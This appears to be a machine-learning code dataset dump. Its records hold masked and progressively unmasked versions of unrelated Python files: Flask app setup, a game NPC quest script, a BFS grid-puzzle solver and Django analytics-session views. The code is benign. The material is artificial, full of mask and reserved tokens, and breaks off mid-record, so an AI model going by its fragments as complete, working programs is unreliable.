to see this page\"), \"error\")\n #return redirect(url_for(\"account.login\", next=request.path))\n return redirect(url_for(\"account.login\"))\n\n\ndef configure_before_handlers(app):\n\n @app.before_request\n def authenticate():\n try:\n g.identity = session['identity']\n except Exception:\n g.identity = Identity(0,'Login')\n\n\ndef configure_extensions(app):\n # configure extensions\n db.init_app(app)\n #db.app = app\n #db.create_all()\n mail.init_app(app)\n cache.init_app(app)\n #setup_themes(app)\n\ndef configure_context_processors(app):\n @app.context_processor\n def archives():\n archives = set()\n for dt in Post.query.from_self(Post.create_date).order_by().filter_by(author_id=g.identity.id):\n item = (dt.create_date.year, dt.create_date.month)\n archives.add(item)\n if len(archives) > 5:\n break\n archives = sorted(list(archives))\n return dict(archives=archives)\n\ndef configure_modules(app, modules):\n\n for module, url_prefix in modules:\n app.register_module(module, url_prefix=url_prefix)\n\ndef configure_template_filters(app):\n\n @app.template_filter()\n def timesince(value):\n return helpers.timesince(value)\n\n @app.template_filter()\n def endtags(value):\n return helpers.endtags(value)\n\n @app.template_filter()\n def gravatar(email,size):\n return helpers.gravatar(email,size)\n\n @app.template_filter()\n def format_date(date,s='full'):\n return helpers.format_date(date,s)\n\n @app.template_filter()\n def format_datetime(time,s='full'):\n return helpers.format_datetime(time,s)\n\n @app.template_filter()\n def format_yearmonth(date):\n return '%s-%s'%date\n\ndef configure_logging(app):\n\n mail_handler = \\\n SMTPHandler(app.config['MAIL_SERVER'],\n app.config['DEFAULT_MAIL_SENDER'],\n app.config['ADMINS'],\n 'application error',\n (\n app.config['MAIL_USERNAME'],\n app.config['MAIL_PASSWORD'],\n ))\n\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n formatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s '\n '[in %(pathname)s:%(lineno)d]')\n\n debug_log = os.path.join(app.root_path,\n app.config['DEBUG_LOG'])\n\n debug_file_handler = \\\n RotatingFileHandler(debug_log,\n maxBytes=100000,\n backupCount=10)\n\n debug_file_handler.setLevel(logging.DEBUG)\n debug_file_handler.setFormatter(formatter)\n app.logger.addHandler(debug_file_handler)\n\n error_log = os.path.join(app.root_path,\n app.config['ERROR_LOG'])\n\n error_file_handler = \\\n RotatingFileHandler(error_log,\n maxBytes=100000,\n backupCount=10)\n\n error_file_handler.setLevel(logging.ERROR)\n error_file_handler.setFormatter(formatter)\n app.logger.addHandler(error_file_handler)\n\n",
"step-ids": [
6,
8,
9,
10,
13
]
}
|
[
6,
8,
9,
10,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
if sm.hasItem(4310100, 1):
sm.setSpeakerID(9390220)
sm.sendSayOkay(
"You can't start your voyage until you finish the tutorial quest!")
else:
sm.setSpeakerID(9390220)
sm.sendNext(
'What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.'
)
sm.setSpeakerID(9390220)
sm.sendSay("Just remember, you can't trade without gold!")
sm.giveItem(4310100, 10)
sm.setSpeakerID(9390220)
sm.sendPrev('Check to make sure there you have coins in your inventory.')
<|reserved_special_token_1|>
# Created by MechAviv
# [Maestra Fiametta] | [9390220]
# Commerci Republic : San Commerci
if sm.hasItem(4310100, 1):
sm.setSpeakerID(9390220)
sm.sendSayOkay("You can't start your voyage until you finish the tutorial quest!")
else:
sm.setSpeakerID(9390220)
sm.sendNext("What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.")
sm.setSpeakerID(9390220)
sm.sendSay("Just remember, you can't trade without gold!")
sm.giveItem(4310100, 10)
sm.setSpeakerID(9390220)
sm.sendPrev("Check to make sure there you have coins in your inventory.")
|
flexible
|
{
"blob_id": "c4b9fdba9e9eeccc52999dab9232302f159c882a",
"index": 588,
"step-1": "<mask token>\n",
"step-2": "if sm.hasItem(4310100, 1):\n sm.setSpeakerID(9390220)\n sm.sendSayOkay(\n \"You can't start your voyage until you finish the tutorial quest!\")\nelse:\n sm.setSpeakerID(9390220)\n sm.sendNext(\n 'What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.'\n )\n sm.setSpeakerID(9390220)\n sm.sendSay(\"Just remember, you can't trade without gold!\")\n sm.giveItem(4310100, 10)\n sm.setSpeakerID(9390220)\n sm.sendPrev('Check to make sure there you have coins in your inventory.')\n",
"step-3": "# Created by MechAviv\n# [Maestra Fiametta] | [9390220]\n# Commerci Republic : San Commerci\nif sm.hasItem(4310100, 1):\n sm.setSpeakerID(9390220)\n sm.sendSayOkay(\"You can't start your voyage until you finish the tutorial quest!\")\nelse:\n sm.setSpeakerID(9390220)\n sm.sendNext(\"What? You threw away the coins without finishing the tutorial? (Sighs) I suppose I can give you some more coins so that you can complete the tutorial.\")\n\n\n sm.setSpeakerID(9390220)\n sm.sendSay(\"Just remember, you can't trade without gold!\")\n\n\n sm.giveItem(4310100, 10)\n sm.setSpeakerID(9390220)\n sm.sendPrev(\"Check to make sure there you have coins in your inventory.\")",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from collections import deque
n = -1
D = [(-1 , 0) , (0 , 1) , (1 , 0) , (0 , -1)]
B = -1
up = 0
right = 1
down = 2
left = 3
dic = {}
dic[0] = 'up'
dic[1] = 'right'
dic[2] = 'down'
dic[3] = 'left'
def possi(y , x):
global n
if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:
return False
return True
def move(d , ay , ax , by , bx):
ay += D[d][0]
by += D[d][0]
ax += D[d][1]
bx += D[d][1]
if possi(ay , ax) and possi(by , bx):
return True
return False
def rotate(y , x , tail , dest):
# 목적지, 대각선 검사
if possi(y + D[dest][0] , x + D[dest][1]) and possi(y + D[tail][0] + D[dest][0] , x + D[tail][1] + D[dest][1] ):
return True
return False
def bfs(dp):
q = deque()
# q.append((y , x , tail , step))
q.append( (0 , 1 , 3 , 0) )
while q:
y , x , tail , step = q.popleft()
ty , tx = y + D[tail][0] , x + D[tail][1]
for d in range(4):
if move(d , y , x , ty , tx):
ny = y + D[d][0]
nx = x + D[d][1]
if step + 1 < dp[ny][nx][tail]: # 위치 바뀜 , 꼬리 같음
dp[ny][nx][tail] = step + 1
q.append( (ny , nx , tail , step + 1) )
if d % 2 == tail % 2: # 자신이거나 180는 안돌음
continue
#rotate(ori_tail , new_tail)
if rotate(y , x , tail , d): # if possi(ry , rx) and possi( (ry + ty) // 2, (ry + tx) // 2): # 꼬리가 가는 방향 , 대각선 ??
if step + 1 < dp[y][x][d]:
dp[y][x][d] = step + 1
q.append( (y , x , d , step + 1) ) # 위치 같음 , 꼬리 바뀜
# 머리 꼬리 스왑
y , x , ty , tx = ty , tx , y , x
if rotate(y , x , (tail + 2) % 4 , d): # 이 함수 바꿔주다 스왑 까먹음
if step + 1 < dp[y][x][d]:
dp[y][x][d] = step + 1
q.append( (y , x , d , step + 1) ) # 위치 같음 , 꼬리 바뀜
y , x , ty , tx = ty , tx , y , x
global up , down , right , left
cs = [1e9] * 4
cs[0] = dp[n-1][n-1][up]
cs[1] = dp[n-1][n-1][left]
cs[2] = dp[n-2][n-1][down]
cs[3] = dp[n-1][n-2][right]
#print(cs)
return min(cs)
def solution(b):
global n , B
B = [el[:] for el in b]
n = len(b)
dp = [ [ [1e9] * 4 for _ in range (n)] for _ in range(n)]
# dir: 꼬리가 위, 오, 아, 왼
dp[0][1][3] = 0
answer = bfs(dp)
return answer
#print(solution([[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 1, 1, 0]]))
#print(solution([[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1], [0, 0, 1, 0, 0, 0, 0]]))
#print(solution( [[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 1, 0, 0, 0, 0]]))
#print(solution([[0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0]]))
|
normal
|
{
"blob_id": "feb912ac899208618f00c894458c1fda7a402652",
"index": 1452,
"step-1": "<mask token>\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\n<mask token>\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-2": "<mask token>\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\ndef bfs(dp):\n q = deque()\n q.append((0, 1, 3, 0))\n while q:\n y, x, tail, step = q.popleft()\n ty, tx = y + D[tail][0], x + D[tail][1]\n for d in range(4):\n if move(d, y, x, ty, tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]:\n dp[ny][nx][tail] = step + 1\n q.append((ny, nx, tail, step + 1))\n if d % 2 == tail % 2:\n continue\n if rotate(y, x, tail, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n if rotate(y, x, (tail + 2) % 4, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n global up, down, right, left\n cs = [1000000000.0] * 4\n cs[0] = dp[n - 1][n - 1][up]\n cs[1] = dp[n - 1][n - 1][left]\n cs[2] = dp[n - 2][n - 1][down]\n cs[3] = dp[n - 1][n - 2][right]\n return min(cs)\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-3": "<mask token>\nn = -1\nD = [(-1, 0), (0, 1), (1, 0), (0, -1)]\nB = -1\nup = 0\nright = 1\ndown = 2\nleft = 3\ndic = {}\ndic[0] = 'up'\ndic[1] = 'right'\ndic[2] = 'down'\ndic[3] = 'left'\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\ndef bfs(dp):\n q = deque()\n q.append((0, 1, 3, 0))\n while q:\n y, x, tail, step = q.popleft()\n ty, tx = y + D[tail][0], x + D[tail][1]\n for d in range(4):\n if move(d, y, x, ty, tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]:\n dp[ny][nx][tail] = step + 1\n q.append((ny, nx, tail, step + 1))\n if d % 2 == tail % 2:\n continue\n if rotate(y, x, tail, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n if rotate(y, x, (tail + 2) % 4, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n global up, down, right, left\n cs = [1000000000.0] * 4\n cs[0] = dp[n - 1][n - 1][up]\n cs[1] = dp[n - 1][n - 1][left]\n cs[2] = dp[n - 2][n - 1][down]\n cs[3] = dp[n - 1][n - 2][right]\n return min(cs)\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-4": "from collections import deque\nn = -1\nD = [(-1, 0), (0, 1), (1, 0), (0, -1)]\nB = -1\nup = 0\nright = 1\ndown = 2\nleft = 3\ndic = {}\ndic[0] = 'up'\ndic[1] = 'right'\ndic[2] = 'down'\ndic[3] = 'left'\n\n\ndef possi(y, x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\n\ndef move(d, ay, ax, by, bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay, ax) and possi(by, bx):\n return True\n return False\n\n\ndef rotate(y, x, tail, dest):\n if possi(y + D[dest][0], x + D[dest][1]) and possi(y + D[tail][0] + D[\n dest][0], x + D[tail][1] + D[dest][1]):\n return True\n return False\n\n\ndef bfs(dp):\n q = deque()\n q.append((0, 1, 3, 0))\n while q:\n y, x, tail, step = q.popleft()\n ty, tx = y + D[tail][0], x + D[tail][1]\n for d in range(4):\n if move(d, y, x, ty, tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]:\n dp[ny][nx][tail] = step + 1\n q.append((ny, nx, tail, step + 1))\n if d % 2 == tail % 2:\n continue\n if rotate(y, x, tail, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n if rotate(y, x, (tail + 2) % 4, d):\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append((y, x, d, step + 1))\n y, x, ty, tx = ty, tx, y, x\n global up, down, right, left\n cs = [1000000000.0] * 4\n cs[0] = dp[n - 1][n - 1][up]\n cs[1] = dp[n - 1][n - 1][left]\n cs[2] = dp[n - 2][n - 1][down]\n cs[3] = dp[n - 1][n - 2][right]\n return min(cs)\n\n\ndef solution(b):\n global n, B\n B = [el[:] for el in b]\n n = len(b)\n dp = [[([1000000000.0] * 4) for _ in range(n)] for _ in range(n)]\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n",
"step-5": "from collections import deque\nn = -1\nD = [(-1 , 0) , (0 , 1) , (1 , 0) , (0 , -1)]\nB = -1\nup = 0\nright = 1\ndown = 2\nleft = 3\ndic = {}\ndic[0] = 'up'\ndic[1] = 'right'\ndic[2] = 'down'\ndic[3] = 'left'\n\ndef possi(y , x):\n global n\n if y < 0 or y >= n or x < 0 or x >= n or B[y][x]:\n return False\n return True\n\ndef move(d , ay , ax , by , bx):\n ay += D[d][0]\n by += D[d][0]\n ax += D[d][1]\n bx += D[d][1]\n if possi(ay , ax) and possi(by , bx):\n return True\n return False\n\ndef rotate(y , x , tail , dest):\n # 목적지, 대각선 검사\n if possi(y + D[dest][0] , x + D[dest][1]) and possi(y + D[tail][0] + D[dest][0] , x + D[tail][1] + D[dest][1] ):\n return True\n return False\n\ndef bfs(dp):\n q = deque()\n # q.append((y , x , tail , step))\n q.append( (0 , 1 , 3 , 0) )\n while q:\n y , x , tail , step = q.popleft()\n ty , tx = y + D[tail][0] , x + D[tail][1]\n \n for d in range(4):\n if move(d , y , x , ty , tx):\n ny = y + D[d][0]\n nx = x + D[d][1]\n if step + 1 < dp[ny][nx][tail]: # 위치 바뀜 , 꼬리 같음\n dp[ny][nx][tail] = step + 1\n q.append( (ny , nx , tail , step + 1) )\n\n if d % 2 == tail % 2: # 자신이거나 180는 안돌음\n continue\n\n #rotate(ori_tail , new_tail)\n if rotate(y , x , tail , d): # if possi(ry , rx) and possi( (ry + ty) // 2, (ry + tx) // 2): # 꼬리가 가는 방향 , 대각선 ??\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append( (y , x , d , step + 1) ) # 위치 같음 , 꼬리 바뀜\n\n # 머리 꼬리 스왑\n y , x , ty , tx = ty , tx , y , x \n if rotate(y , x , (tail + 2) % 4 , d): # 이 함수 바꿔주다 스왑 까먹음\n if step + 1 < dp[y][x][d]:\n dp[y][x][d] = step + 1\n q.append( (y , x , d , step + 1) ) # 위치 같음 , 꼬리 바뀜\n y , x , ty , tx = ty , tx , y , x\n\n\n\n\n global up , down , right , left\n cs = [1e9] * 4\n cs[0] = dp[n-1][n-1][up]\n cs[1] = dp[n-1][n-1][left]\n cs[2] = dp[n-2][n-1][down]\n cs[3] = dp[n-1][n-2][right]\n #print(cs)\n return min(cs)\n \n\n \n\n\n\ndef solution(b):\n global n , B\n B = [el[:] for el in b]\n n = len(b)\n dp = [ [ [1e9] * 4 for _ in range (n)] for _ in range(n)]\n # dir: 꼬리가 위, 오, 아, 왼\n dp[0][1][3] = 0\n answer = bfs(dp)\n return answer\n\n#print(solution([[0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0], [0, 0, 1, 1, 0]]))\n\n#print(solution([[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 1], [0, 0, 1, 0, 0, 0, 0]]))\n\n#print(solution( [[0, 0, 0, 0, 0, 0, 1], [1, 1, 1, 1, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 1, 0], [0, 0, 1, 0, 0, 0, 0]]))\n\n#print(solution([[0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 1, 1, 1, 1, 1, 1, 1, 1], [0, 0, 1, 1, 1, 1, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0], [1, 1, 1, 1, 1, 1, 1, 1, 0]]))",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
return HttpResponse(template.render(context, request))
<|reserved_special_token_0|>
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
<|reserved_special_token_0|>
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
<|reserved_special_token_0|>
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
return HttpResponse(template.render(context, request))
<|reserved_special_token_0|>
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect('/')
template = loader.get_template('aimodel/main.html')
context = dict()
context['datasets'] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session['analytics'].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
<|reserved_special_token_0|>
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
